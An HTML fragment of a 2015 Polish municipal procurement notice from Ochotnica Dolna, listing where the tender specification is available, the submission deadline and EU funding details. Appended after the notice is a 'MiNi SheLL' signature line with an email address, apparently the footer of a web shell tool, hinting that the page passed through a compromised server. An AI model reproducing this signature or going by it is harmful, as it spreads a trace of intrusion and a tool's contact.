<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.malopolska.pl/bip/ochotnica dolna<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Ochotnicy Dolnej
34-452 Ochotnica Dolna os. Dłubacze 160
pok. 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.06.2015 godzina 08:45, miejsce: Urząd Gminy w Ochotnicy Dolnej
34-452 Ochotnica Dolna os. Dłubacze 160
pok. 17.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> MRPO na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com